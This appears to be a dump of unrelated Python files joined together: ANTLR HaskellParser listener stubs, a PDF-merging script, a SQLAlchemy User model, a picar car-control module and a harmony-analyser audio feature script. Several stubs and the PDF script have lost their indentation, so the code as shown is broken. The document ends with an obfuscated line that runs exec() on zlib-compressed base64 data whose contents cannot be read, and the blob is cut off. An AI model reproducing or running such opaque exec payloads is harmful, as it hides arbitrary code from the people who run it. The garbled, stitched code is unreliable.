def exitQual(self, ctx:HaskellParser.QualContext):
    pass
# Enter a parse tree produced by HaskellParser#fbinds.
def enterFbinds(self, ctx:HaskellParser.FbindsContext):
    pass
# Exit a parse tree produced by HaskellParser#fbinds.
def exitFbinds(self, ctx:HaskellParser.FbindsContext):
    pass
# Enter a parse tree produced by HaskellParser#fbind.
def enterFbind(self, ctx:HaskellParser.FbindContext):
    pass
# Exit a parse tree produced by HaskellParser#fbind.
def exitFbind(self, ctx:HaskellParser.FbindContext):
    pass
# Enter a parse tree produced by HaskellParser#dbinds.
def enterDbinds(self, ctx:HaskellParser.DbindsContext):
    pass
# Exit a parse tree produced by HaskellParser#dbinds.
def exitDbinds(self, ctx:HaskellParser.DbindsContext):
    pass
# Enter a parse tree produced by HaskellParser#dbind.
def enterDbind(self, ctx:HaskellParser.DbindContext):
    pass
# Exit a parse tree produced by HaskellParser#dbind.
def exitDbind(self, ctx:HaskellParser.DbindContext):
    pass
# Enter a parse tree produced by HaskellParser#name_boolformula_opt.
def enterName_boolformula_opt(self, ctx:HaskellParser.Name_boolformula_optContext):
    pass
# Exit a parse tree produced by HaskellParser#name_boolformula_opt.
def exitName_boolformula_opt(self, ctx:HaskellParser.Name_boolformula_optContext):
    pass
# Enter a parse tree produced by HaskellParser#name_boolformula_and.
def enterName_boolformula_and(self, ctx:HaskellParser.Name_boolformula_andContext):
    pass
# Exit a parse tree produced by HaskellParser#name_boolformula_and.
def exitName_boolformula_and(self, ctx:HaskellParser.Name_boolformula_andContext):
    pass
# Enter a parse tree produced by HaskellParser#name_boolformula_and_list.
def enterName_boolformula_and_list(self, ctx:HaskellParser.Name_boolformula_and_listContext):
    pass
# Exit a parse tree produced by HaskellParser#name_boolformula_and_list.
def exitName_boolformula_and_list(self, ctx:HaskellParser.Name_boolformula_and_listContext):
pass
# Enter a parse tree produced by HaskellParser#name_boolformula_atom.
def enterName_boolformula_atom(self, ctx:HaskellParser.Name_boolformula_atomContext):
pass
# Exit a parse tree produced by HaskellParser#name_boolformula_atom.
def exitName_boolformula_atom(self, ctx:HaskellParser.Name_boolformula_atomContext):
pass
# Enter a parse tree produced by HaskellParser#namelist.
def enterNamelist(self, ctx:HaskellParser.NamelistContext):
pass
# Exit a parse tree produced by HaskellParser#namelist.
def exitNamelist(self, ctx:HaskellParser.NamelistContext):
pass
# Enter a parse tree produced by HaskellParser#name_var.
def enterName_var(self, ctx:HaskellParser.Name_varContext):
pass
# Exit a parse tree produced by HaskellParser#name_var.
def exitName_var(self, ctx:HaskellParser.Name_varContext):
pass
# Enter a parse tree produced by HaskellParser#qcon_nowiredlist.
def enterQcon_nowiredlist(self, ctx:HaskellParser.Qcon_nowiredlistContext):
pass
# Exit a parse tree produced by HaskellParser#qcon_nowiredlist.
def exitQcon_nowiredlist(self, ctx:HaskellParser.Qcon_nowiredlistContext):
pass
# Enter a parse tree produced by HaskellParser#qcon.
def enterQcon(self, ctx:HaskellParser.QconContext):
pass
# Exit a parse tree produced by HaskellParser#qcon.
def exitQcon(self, ctx:HaskellParser.QconContext):
pass
# Enter a parse tree produced by HaskellParser#gen_qcon.
def enterGen_qcon(self, ctx:HaskellParser.Gen_qconContext):
pass
# Exit a parse tree produced by HaskellParser#gen_qcon.
def exitGen_qcon(self, ctx:HaskellParser.Gen_qconContext):
pass
# Enter a parse tree produced by HaskellParser#con.
def enterCon(self, ctx:HaskellParser.ConContext):
pass
# Exit a parse tree produced by HaskellParser#con.
def exitCon(self, ctx:HaskellParser.ConContext):
pass
# Enter a parse tree produced by HaskellParser#con_list.
def enterCon_list(self, ctx:HaskellParser.Con_listContext):
pass
# Exit a parse tree produced by HaskellParser#con_list.
def exitCon_list(self, ctx:HaskellParser.Con_listContext):
pass
# Enter a parse tree produced by HaskellParser#sysdcon_nolist.
def enterSysdcon_nolist(self, ctx:HaskellParser.Sysdcon_nolistContext):
pass
# Exit a parse tree produced by HaskellParser#sysdcon_nolist.
def exitSysdcon_nolist(self, ctx:HaskellParser.Sysdcon_nolistContext):
pass
# Enter a parse tree produced by HaskellParser#sysdcon.
def enterSysdcon(self, ctx:HaskellParser.SysdconContext):
pass
# Exit a parse tree produced by HaskellParser#sysdcon.
def exitSysdcon(self, ctx:HaskellParser.SysdconContext):
pass
# Enter a parse tree produced by HaskellParser#conop.
def enterConop(self, ctx:HaskellParser.ConopContext):
pass
# Exit a parse tree produced by HaskellParser#conop.
def exitConop(self, ctx:HaskellParser.ConopContext):
pass
# Enter a parse tree produced by HaskellParser#qconop.
def enterQconop(self, ctx:HaskellParser.QconopContext):
pass
# Exit a parse tree produced by HaskellParser#qconop.
def exitQconop(self, ctx:HaskellParser.QconopContext):
pass
# Enter a parse tree produced by HaskellParser#gconsym.
def enterGconsym(self, ctx:HaskellParser.GconsymContext):
pass
# Exit a parse tree produced by HaskellParser#gconsym.
def exitGconsym(self, ctx:HaskellParser.GconsymContext):
pass
# Enter a parse tree produced by HaskellParser#gtycon.
def enterGtycon(self, ctx:HaskellParser.GtyconContext):
pass
# Exit a parse tree produced by HaskellParser#gtycon.
def exitGtycon(self, ctx:HaskellParser.GtyconContext):
pass
# Enter a parse tree produced by HaskellParser#ntgtycon.
def enterNtgtycon(self, ctx:HaskellParser.NtgtyconContext):
pass
# Exit a parse tree produced by HaskellParser#ntgtycon.
def exitNtgtycon(self, ctx:HaskellParser.NtgtyconContext):
pass
# Enter a parse tree produced by HaskellParser#oqtycon.
def enterOqtycon(self, ctx:HaskellParser.OqtyconContext):
pass
# Exit a parse tree produced by HaskellParser#oqtycon.
def exitOqtycon(self, ctx:HaskellParser.OqtyconContext):
pass
# Enter a parse tree produced by HaskellParser#qtyconop.
def enterQtyconop(self, ctx:HaskellParser.QtyconopContext):
pass
# Exit a parse tree produced by HaskellParser#qtyconop.
def exitQtyconop(self, ctx:HaskellParser.QtyconopContext):
pass
# Enter a parse tree produced by HaskellParser#qtycon.
def enterQtycon(self, ctx:HaskellParser.QtyconContext):
pass
# Exit a parse tree produced by HaskellParser#qtycon.
def exitQtycon(self, ctx:HaskellParser.QtyconContext):
pass
# Enter a parse tree produced by HaskellParser#tycon.
def enterTycon(self, ctx:HaskellParser.TyconContext):
pass
# Exit a parse tree produced by HaskellParser#tycon.
def exitTycon(self, ctx:HaskellParser.TyconContext):
pass
# Enter a parse tree produced by HaskellParser#qtyconsym.
def enterQtyconsym(self, ctx:HaskellParser.QtyconsymContext):
pass
# Exit a parse tree produced by HaskellParser#qtyconsym.
def exitQtyconsym(self, ctx:HaskellParser.QtyconsymContext):
pass
# Enter a parse tree produced by HaskellParser#tyconsym.
def enterTyconsym(self, ctx:HaskellParser.TyconsymContext):
pass
# Exit a parse tree produced by HaskellParser#tyconsym.
def exitTyconsym(self, ctx:HaskellParser.TyconsymContext):
pass
# Enter a parse tree produced by HaskellParser#op.
def enterOp(self, ctx:HaskellParser.OpContext):
pass
# Exit a parse tree produced by HaskellParser#op.
def exitOp(self, ctx:HaskellParser.OpContext):
pass
# Enter a parse tree produced by HaskellParser#varop.
def enterVarop(self, ctx:HaskellParser.VaropContext):
pass
# Exit a parse tree produced by HaskellParser#varop.
def exitVarop(self, ctx:HaskellParser.VaropContext):
pass
# Enter a parse tree produced by HaskellParser#qop.
def enterQop(self, ctx:HaskellParser.QopContext):
pass
# Exit a parse tree produced by HaskellParser#qop.
def exitQop(self, ctx:HaskellParser.QopContext):
pass
# Enter a parse tree produced by HaskellParser#qopm.
def enterQopm(self, ctx:HaskellParser.QopmContext):
pass
# Exit a parse tree produced by HaskellParser#qopm.
def exitQopm(self, ctx:HaskellParser.QopmContext):
pass
# Enter a parse tree produced by HaskellParser#hole_op.
def enterHole_op(self, ctx:HaskellParser.Hole_opContext):
pass
# Exit a parse tree produced by HaskellParser#hole_op.
def exitHole_op(self, ctx:HaskellParser.Hole_opContext):
pass
# Enter a parse tree produced by HaskellParser#qvarop.
def enterQvarop(self, ctx:HaskellParser.QvaropContext):
pass
# Exit a parse tree produced by HaskellParser#qvarop.
def exitQvarop(self, ctx:HaskellParser.QvaropContext):
pass
# Enter a parse tree produced by HaskellParser#qvaropm.
def enterQvaropm(self, ctx:HaskellParser.QvaropmContext):
pass
# Exit a parse tree produced by HaskellParser#qvaropm.
def exitQvaropm(self, ctx:HaskellParser.QvaropmContext):
pass
# Enter a parse tree produced by HaskellParser#tyvar.
def enterTyvar(self, ctx:HaskellParser.TyvarContext):
pass
# Exit a parse tree produced by HaskellParser#tyvar.
def exitTyvar(self, ctx:HaskellParser.TyvarContext):
pass
# Enter a parse tree produced by HaskellParser#tyvarop.
def enterTyvarop(self, ctx:HaskellParser.TyvaropContext):
pass
# Exit a parse tree produced by HaskellParser#tyvarop.
def exitTyvarop(self, ctx:HaskellParser.TyvaropContext):
pass
# Enter a parse tree produced by HaskellParser#tyvarid.
def enterTyvarid(self, ctx:HaskellParser.TyvaridContext):
pass
# Exit a parse tree produced by HaskellParser#tyvarid.
def exitTyvarid(self, ctx:HaskellParser.TyvaridContext):
pass
# Enter a parse tree produced by HaskellParser#tycls.
def enterTycls(self, ctx:HaskellParser.TyclsContext):
pass
# Exit a parse tree produced by HaskellParser#tycls.
def exitTycls(self, ctx:HaskellParser.TyclsContext):
pass
# Enter a parse tree produced by HaskellParser#qtycls.
def enterQtycls(self, ctx:HaskellParser.QtyclsContext):
pass
# Exit a parse tree produced by HaskellParser#qtycls.
def exitQtycls(self, ctx:HaskellParser.QtyclsContext):
pass
# Enter a parse tree produced by HaskellParser#var.
def enterVar(self, ctx:HaskellParser.VarContext):
pass
# Exit a parse tree produced by HaskellParser#var.
def exitVar(self, ctx:HaskellParser.VarContext):
pass
# Enter a parse tree produced by HaskellParser#qvar.
def enterQvar(self, ctx:HaskellParser.QvarContext):
pass
# Exit a parse tree produced by HaskellParser#qvar.
def exitQvar(self, ctx:HaskellParser.QvarContext):
pass
# Enter a parse tree produced by HaskellParser#qvarid.
def enterQvarid(self, ctx:HaskellParser.QvaridContext):
pass
# Exit a parse tree produced by HaskellParser#qvarid.
def exitQvarid(self, ctx:HaskellParser.QvaridContext):
pass
# Enter a parse tree produced by HaskellParser#varid.
def enterVarid(self, ctx:HaskellParser.VaridContext):
pass
# Exit a parse tree produced by HaskellParser#varid.
def exitVarid(self, ctx:HaskellParser.VaridContext):
pass
# Enter a parse tree produced by HaskellParser#qvarsym.
def enterQvarsym(self, ctx:HaskellParser.QvarsymContext):
pass
# Exit a parse tree produced by HaskellParser#qvarsym.
def exitQvarsym(self, ctx:HaskellParser.QvarsymContext):
pass
# Enter a parse tree produced by HaskellParser#qvarsym_no_minus.
def enterQvarsym_no_minus(self, ctx:HaskellParser.Qvarsym_no_minusContext):
pass
# Exit a parse tree produced by HaskellParser#qvarsym_no_minus.
def exitQvarsym_no_minus(self, ctx:HaskellParser.Qvarsym_no_minusContext):
pass
# Enter a parse tree produced by HaskellParser#varsym.
def enterVarsym(self, ctx:HaskellParser.VarsymContext):
pass
# Exit a parse tree produced by HaskellParser#varsym.
def exitVarsym(self, ctx:HaskellParser.VarsymContext):
pass
# Enter a parse tree produced by HaskellParser#varsym_no_minus.
def enterVarsym_no_minus(self, ctx:HaskellParser.Varsym_no_minusContext):
pass
# Exit a parse tree produced by HaskellParser#varsym_no_minus.
def exitVarsym_no_minus(self, ctx:HaskellParser.Varsym_no_minusContext):
pass
# Enter a parse tree produced by HaskellParser#special_id.
def enterSpecial_id(self, ctx:HaskellParser.Special_idContext):
pass
# Exit a parse tree produced by HaskellParser#special_id.
def exitSpecial_id(self, ctx:HaskellParser.Special_idContext):
pass
# Enter a parse tree produced by HaskellParser#qconid.
def enterQconid(self, ctx:HaskellParser.QconidContext):
pass
# Exit a parse tree produced by HaskellParser#qconid.
def exitQconid(self, ctx:HaskellParser.QconidContext):
pass
# Enter a parse tree produced by HaskellParser#conid.
def enterConid(self, ctx:HaskellParser.ConidContext):
pass
# Exit a parse tree produced by HaskellParser#conid.
def exitConid(self, ctx:HaskellParser.ConidContext):
pass
# Enter a parse tree produced by HaskellParser#qconsym.
def enterQconsym(self, ctx:HaskellParser.QconsymContext):
pass
# Exit a parse tree produced by HaskellParser#qconsym.
def exitQconsym(self, ctx:HaskellParser.QconsymContext):
pass
# Enter a parse tree produced by HaskellParser#consym.
def enterConsym(self, ctx:HaskellParser.ConsymContext):
pass
# Exit a parse tree produced by HaskellParser#consym.
def exitConsym(self, ctx:HaskellParser.ConsymContext):
pass
# Enter a parse tree produced by HaskellParser#literal.
def enterLiteral(self, ctx:HaskellParser.LiteralContext):
pass
# Exit a parse tree produced by HaskellParser#literal.
def exitLiteral(self, ctx:HaskellParser.LiteralContext):
pass
# Enter a parse tree produced by HaskellParser#opn.
def enterOpn(self, ctx:HaskellParser.OpnContext):
pass
# Exit a parse tree produced by HaskellParser#opn.
def exitOpn(self, ctx:HaskellParser.OpnContext):
pass
# Enter a parse tree produced by HaskellParser#close.
def enterClose(self, ctx:HaskellParser.CloseContext):
pass
# Exit a parse tree produced by HaskellParser#close.
def exitClose(self, ctx:HaskellParser.CloseContext):
pass
# Enter a parse tree produced by HaskellParser#semi.
def enterSemi(self, ctx:HaskellParser.SemiContext):
pass
# Exit a parse tree produced by HaskellParser#semi.
def exitSemi(self, ctx:HaskellParser.SemiContext):
pass
# Enter a parse tree produced by HaskellParser#modid.
def enterModid(self, ctx:HaskellParser.ModidContext):
pass
# Exit a parse tree produced by HaskellParser#modid.
def exitModid(self, ctx:HaskellParser.ModidContext):
pass
# Enter a parse tree produced by HaskellParser#commas.
def enterCommas(self, ctx:HaskellParser.CommasContext):
pass
# Exit a parse tree produced by HaskellParser#commas.
def exitCommas(self, ctx:HaskellParser.CommasContext):
pass
# Enter a parse tree produced by HaskellParser#bars.
def enterBars(self, ctx:HaskellParser.BarsContext):
pass
# Exit a parse tree produced by HaskellParser#bars.
def exitBars(self, ctx:HaskellParser.BarsContext):
pass
# Enter a parse tree produced by HaskellParser#special.
def enterSpecial(self, ctx:HaskellParser.SpecialContext):
pass
# Exit a parse tree produced by HaskellParser#special.
def exitSpecial(self, ctx:HaskellParser.SpecialContext):
pass
# Enter a parse tree produced by HaskellParser#symbol.
def enterSymbol(self, ctx:HaskellParser.SymbolContext):
pass
# Exit a parse tree produced by HaskellParser#symbol.
def exitSymbol(self, ctx:HaskellParser.SymbolContext):
pass
# Enter a parse tree produced by HaskellParser#ascSymbol.
def enterAscSymbol(self, ctx:HaskellParser.AscSymbolContext):
pass
# Exit a parse tree produced by HaskellParser#ascSymbol.
def exitAscSymbol(self, ctx:HaskellParser.AscSymbolContext):
pass
# Enter a parse tree produced by HaskellParser#integer.
def enterInteger(self, ctx:HaskellParser.IntegerContext):
pass
# Exit a parse tree produced by HaskellParser#integer.
def exitInteger(self, ctx:HaskellParser.IntegerContext):
pass
# Enter a parse tree produced by HaskellParser#pfloat.
def enterPfloat(self, ctx:HaskellParser.PfloatContext):
pass
# Exit a parse tree produced by HaskellParser#pfloat.
def exitPfloat(self, ctx:HaskellParser.PfloatContext):
pass
# Enter a parse tree produced by HaskellParser#pchar.
def enterPchar(self, ctx:HaskellParser.PcharContext):
pass
# Exit a parse tree produced by HaskellParser#pchar.
def exitPchar(self, ctx:HaskellParser.PcharContext):
pass
# Enter a parse tree produced by HaskellParser#pstring.
def enterPstring(self, ctx:HaskellParser.PstringContext):
pass
# Exit a parse tree produced by HaskellParser#pstring.
def exitPstring(self, ctx:HaskellParser.PstringContext):
pass
del HaskellParser
|
nilq/baby-python
|
python
|
"""
Author-Aastha Singh
pythonscript to merge all pdf files in one single pdf present in the current working directory
"""
import os
from PyPDF2 import PdfFileMerger #pip install PyPDF2
#listing out all the pdf in the current working directory using OS library
pdfs = [file for file in os.listdir() if file.endswith(".pdf")]
merger = PdfFileMerger()
#merging all the pdf
for pdf in pdfs:
merger.append(open(pdf, 'rb'))
with open("merged-result.pdf", "wb") as merge:
merger.write(merge)
|
nilq/baby-python
|
python
|
from pydantic.types import UUID4
from sqlalchemy.orm.session import Session, object_session
from sqlalchemy.sql import expression
from sqlalchemy.sql.schema import Column, Index
from sqlalchemy.sql.sqltypes import Boolean, String
from sqlalchemy_utils.types import TSVectorType
from wattle.core.const import SCHEMA, CoreErrorType
from wattle.core.exceptions import CoreError
from wattle.core.models.db.common import Base, DateTimeMixin, IdentifierMixin
from wattle.core.models.py.user import (
BasicUserCreateModel,
UserCreateModel,
UserUpdateModel,
)
from wattle.core.utils.auth import get_password_hash
class User(Base, IdentifierMixin, DateTimeMixin):
    """ORM model for an application user.

    Combines ``IdentifierMixin`` (primary key) and ``DateTimeMixin``
    (timestamps) with credential/profile columns plus a trigram-indexed
    plain-text search column.
    """

    __tablename__ = "user"
    __table_args__ = (
        # GIN trigram index supporting fast similarity/ILIKE searches
        # over the denormalized ``search_plain`` column.
        Index(
            "idx_search_plain_trgm",
            "search_plain",
            postgresql_ops={"search_plain": "gin_trgm_ops"},
            postgresql_using="gin",
        ),
        {
            "schema": SCHEMA,
        },
    )

    # Nullable: "basic" users (see create_basic) may exist without an email.
    email = Column(String, unique=True, nullable=True)
    hashed_password = Column(String, nullable=False)
    verified = Column(
        Boolean, default=False, server_default=expression.false(), nullable=False
    )
    first_name = Column(String, nullable=False)
    last_name = Column(String, nullable=False)
    search_plain = Column(String, nullable=True)
    search_vector = Column(TSVectorType("first_name", "last_name"))

    @classmethod
    def _raise_if_email_taken(cls, session: Session, email: str) -> None:
        """Raise ``CoreError(EMAIL_CONFLICT)`` if *email* is already registered."""
        if cls.get_by_email(session, email):
            raise CoreError(CoreErrorType.EMAIL_CONFLICT)

    @classmethod
    def get_by_id(cls, session: Session, id_: UUID4) -> "User":
        """Return the user with primary key *id_*, or ``None`` if absent."""
        return session.query(cls).get(id_)

    @classmethod
    def get_by_email(cls, session: Session, email: str) -> "User":
        """Return the user with *email*, or ``None`` if absent."""
        return session.query(cls).filter(cls.email == email).first()

    @classmethod
    def create(cls, session: Session, data: UserCreateModel) -> "User":
        """Create, persist and return a full user with a hashed password.

        Raises:
            CoreError: ``EMAIL_CONFLICT`` if the email is already taken.
        """
        cls._raise_if_email_taken(session, data.email)
        user = cls(
            **data.dict(exclude={"password", "confirm_password"}),
            hashed_password=get_password_hash(data.password),
            verified=False,
        )
        session.add(user)
        session.commit()
        session.refresh(user)
        return user

    @classmethod
    def create_basic(cls, session: Session, data: BasicUserCreateModel) -> "User":
        """Create a minimal (password-less) user; email is optional.

        Raises:
            CoreError: ``EMAIL_CONFLICT`` if a supplied email is taken.
        """
        if data.email:
            cls._raise_if_email_taken(session, data.email)
        user = cls(
            **data.dict(),
            # Placeholder value: basic users cannot authenticate by password.
            hashed_password="basic-user",
            verified=False,
        )
        session.add(user)
        session.commit()
        session.refresh(user)
        return user

    def verify(self) -> None:
        """Mark this user as verified and commit immediately."""
        self.verified = True
        object_session(self).commit()

    def change_password(self, new_password: str) -> None:
        """Replace the stored hash with the hash of *new_password* and commit."""
        self.hashed_password = get_password_hash(new_password)
        object_session(self).commit()

    def update(self, data: UserUpdateModel) -> None:
        """Update the profile name fields from *data* and commit."""
        self.first_name = data.first_name
        self.last_name = data.last_name
        object_session(self).commit()
|
nilq/baby-python
|
python
|
import servoHouse
from picar import back_wheels
import picar
def init():
    """Initialise the car hardware: back-wheel driver and steering servo.

    Exposes the back-wheel controller as the module-level global ``bw``
    used by forward/backward/stop.
    """
    # BUG FIX: picar.setup() was called twice (before and after creating
    # the wheel controller); a single call suffices.
    picar.setup()
    global bw
    bw = back_wheels.Back_Wheels()
    servoHouse.init()
def forward(speed):
    # Drive the car forward at the given speed.
    # NOTE(review): this deliberately calls bw.backward() -- presumably the
    # drive motors are wired reversed on this chassis (backward() below
    # mirrors it by calling bw.forward()). Confirm before "fixing".
    bw.speed = speed
    bw.backward()
def backward(speed):
    # Drive the car backward at the given speed.
    # NOTE(review): calls bw.forward() -- mirror of forward() above,
    # presumably compensating for reversed motor wiring; confirm.
    bw.speed = speed
    bw.forward()
def stop():
    # Halt the back wheels (requires init() to have set the global bw).
    bw.stop()
def steer(ang):
    # Set the steering servo to the given angle via the servo helper module.
    servoHouse.setSteer(ang)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
#!/usr/bin/python
#
# Author Yann Bayle
# E-mail bayle.yann@live.fr
# License MIT
# Created 12/04/2017
# Updated 12/04/2017
# Version 1.0.0
#
"""
Description of harmony-analyser-parser.py
======================
:Example:
python harmony-analyser-parser.py
"""
import os
import re
import sys
import utils
import shutil
import argparse
def extract_features(in_dir, out_dir, path, verbose=False):
    """Run the harmony-analyser jar over the .wav files in *in_dir*.

    The jar is copied into in_dir (the tool operates on its cwd), each
    analysis option is run in turn, and the produced .txt feature files
    are copied to out_dir.

    Args:
        in_dir: directory containing the .wav files to analyse.
        out_dir: directory receiving the generated .txt feature files.
        path: directory containing the harmony-analyser jar.
        verbose: forwarded to utils.run_cmd for command echoing.
    """
    in_dir = utils.abs_path_dir(in_dir)
    path = utils.abs_path_dir(path)
    cur_dir = os.getcwd()
    os.chdir(in_dir)
    script = "harmony-analyser-script-jar-with-dependencies.jar"
    # NOTE(review): plain concatenation assumes abs_path_dir() returns a
    # trailing separator -- confirm in utils.
    src = path + script
    dst = in_dir + script
    shutil.copy(src, dst)
    options = [
        "nnls-chroma:nnls-chroma",
        "nnls-chroma:chordino-tones",
        "nnls-chroma:chordino-labels",
        "qm-vamp-plugins:qm-keydetector",
        "chord_analyser:tps_distance"
        # "chord_analyser:chord_complexity_distance",
        # "chroma_analyser:complexity_difference",
        # "chord_analyser:average_chord_complexity_distance"
    ]
    try:
        for opt in options:
            cmd = "java -jar " + script + " -a " + opt + " -s .wav -t 0.07"
            utils.run_cmd(cmd, verbose)
        cp_cmd = "cp *.txt " + out_dir
        utils.run_cmd(cp_cmd)
        # utils.run_cmd("rm *.txt")
    finally:
        # BUG FIX: previously a failing command left the copied jar behind
        # and the process stuck in in_dir; always clean up and restore cwd.
        os.remove(dst)
        os.chdir(cur_dir)
def main(args):
    """
    @brief Main entry point
    """
    path = utils.abs_path_dir(args.path)
    in_dir = utils.abs_path_dir(args.in_dir)
    out_dir = utils.abs_path_dir(args.out_dir)
    # Collect ids (3-9 digit tokens in the output filenames) of songs whose
    # features were already extracted, so they are skipped below.
    # NOTE(review): m.group() will raise AttributeError if a filename has
    # no digit run -- assumes all files in out_dir are feature files.
    id_songs_feat_done = []
    for filen in os.listdir(out_dir):
        if os.path.isfile(out_dir + filen):
            m = re.search(r"\d{3,9}", filen)
            id_songs_feat_done.append(m.group())
    id_songs_feat_done = list(set(id_songs_feat_done))
    index = 0
    with open("../data/filelist.csv", "r") as filep:
        for line in filep:
            row = line[:-1].split(",")
            # Check if features have been extracted by YAAFE, Marsyas & Essentia
            if "1" in row[6] and "1" in row[7] and "1" in row[8]:
                if not row[0] in id_songs_feat_done:
                    # Audio folder name appears to be <col1>_<col2>_<id>;
                    # confirm against the dataset layout.
                    folder = in_dir + row[1] + "_" + row[2] + "_" + row[0]
                    index += 1
                    print(str(index) + " " + folder)
                    extract_features(folder, out_dir, path)
if __name__ == "__main__":
PARSER = argparse.ArgumentParser(
description="Parser for harmony-analyser")
PARSER.add_argument(
"-i",
"--in_dir",
help="The intput directory containing wave files",
type=str,
default="/media/sf_SharedFolder/DataSets/Recisio/audio/",
metavar="in_dir")
PARSER.add_argument(
"-o",
"--out_dir",
help="The output directory for storing features",
type=str,
default="/media/sf_DATA/ISMIR2017/features/origins/chromas/",
metavar="out_dir")
PARSER.add_argument(
"-p",
"--path",
help="The path for the harmony-analyser script",
type=str,
default="/home/yann/Documents/harmony-analyser/harmony-analyser/target/",
metavar="path")
main(PARSER.parse_args())
|
nilq/baby-python
|
python
|
import zlib,base64
exec(zlib.decompress(base64.b64decode("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